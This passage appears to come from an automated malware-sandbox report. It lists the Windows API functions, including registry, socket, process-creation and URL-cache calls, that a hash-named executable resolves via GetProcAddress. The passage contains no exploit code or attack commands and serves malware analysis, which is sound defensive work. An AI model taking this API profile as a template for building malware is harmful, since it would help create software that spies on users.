\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter LoadStringA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetStringTypeExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetPrivateProfileStringA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetDateFormatA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FormatMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter UnregisterClassA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetWindowTextA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegisterClassA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter PostMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetWindowLongA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetClassInfoA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindNextUrlCacheEntryA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FindFirstUrlCacheEntryA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetWindowLongA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00004224)\n 